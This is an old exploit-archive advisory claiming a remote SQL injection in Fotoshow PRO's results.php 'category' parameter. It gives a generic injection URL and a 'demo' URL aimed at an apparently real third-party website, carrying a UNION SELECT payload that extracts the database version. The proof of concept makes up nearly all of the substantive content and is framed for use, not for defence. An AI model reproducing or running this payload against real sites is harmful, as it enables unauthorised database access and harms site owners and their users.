[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Fotoshow PRO (category) Remote SQL Injection Vulnerability
# Published : 2009-08-18
# Author : darkmasking
# Previous Title : Joomla Component MisterEstate Blind SQL Injection Exploit
# Next Title : phpfreeBB 1.0 Remote BLIND SQL Injection Vulnerability


[??]====================================================================================================================[_][-][X]
[??]                                                                             					     [??]
[??]      	                   Fotoshow PROa?¢ (category) Remote SQL Injection Vulnerability  		             [??]
[??]              				         							             [??]
[??]            		 	        =======    ------d-------m------     ====    ====   			             [??]
[??]             	 	        ||     =        | |(o o)| |          ||   ||   ||   			             [??]
[??]             		        ||     =          ||(~)||            ||        ||   			             [??]
[??]             	 	        =======             /|              ||        ||  			             [??]
[??]==========================================================================================================================[??]
[??] 				          Author         : darkmasking		 				             [??]
[??] 				          Date           : August, 15th 2009           				             [??]
[??]           		 	          Contact        : darkmasking[at]gmail[dot]com  			             [??]
[??]				          Critical Level : Dangerous (*RED)		  			             [??]
[??]--------------------------------------------------------------------------------------------------------------------------[??]
[??] Affected software description :        					             				     [??]
[??] Software : Fotoshow PROa?¢							            				     [??]
[??] Vendor   : http://www.fotoshowpro.com/					            				     [??]
[??] Price    : $5,000 (USD) http://www.fotoshowpro.com/features.php _o/	             				     [??]
[??]==========================================================================================================================[??]
[??]														             [??]
[??] [~] SQLi POC												             [??]
[??] 														             [??]
[??] [+] http://www.target.com/[path]/results.php?category=[SQli]`						             [??]
[??]														             [??]
[??]														             [??]
[??]--------------------------------------------------------------------------------------------------------------------------[??]
[??]														             [??]
[??] [~] SQLi POC Demo													     [??]
[??]															     [??]
[??] [+] http://www.macduffeverton.com/stock/results.php?category=-9999 and 1=0 union select null,version(),null,null,null--  [??]
[??]														             [??]
[??]--------------------------------------------------------------------------------------------------------------------------[??]
[??]														             [??]
[??] [~] Greetz													             [??]
[??]														             [??]
[??]	Sorry bro belum dapat teman, jadi untuk diri sendiri aja! (SELAMAT MERAYAKAN 17an | Semoga Meriah)	             [??]
[??]														             [??]
[??]														             [??]
[??]==========================================================================================================================[??]

# www.Syue.com [2009-08-18]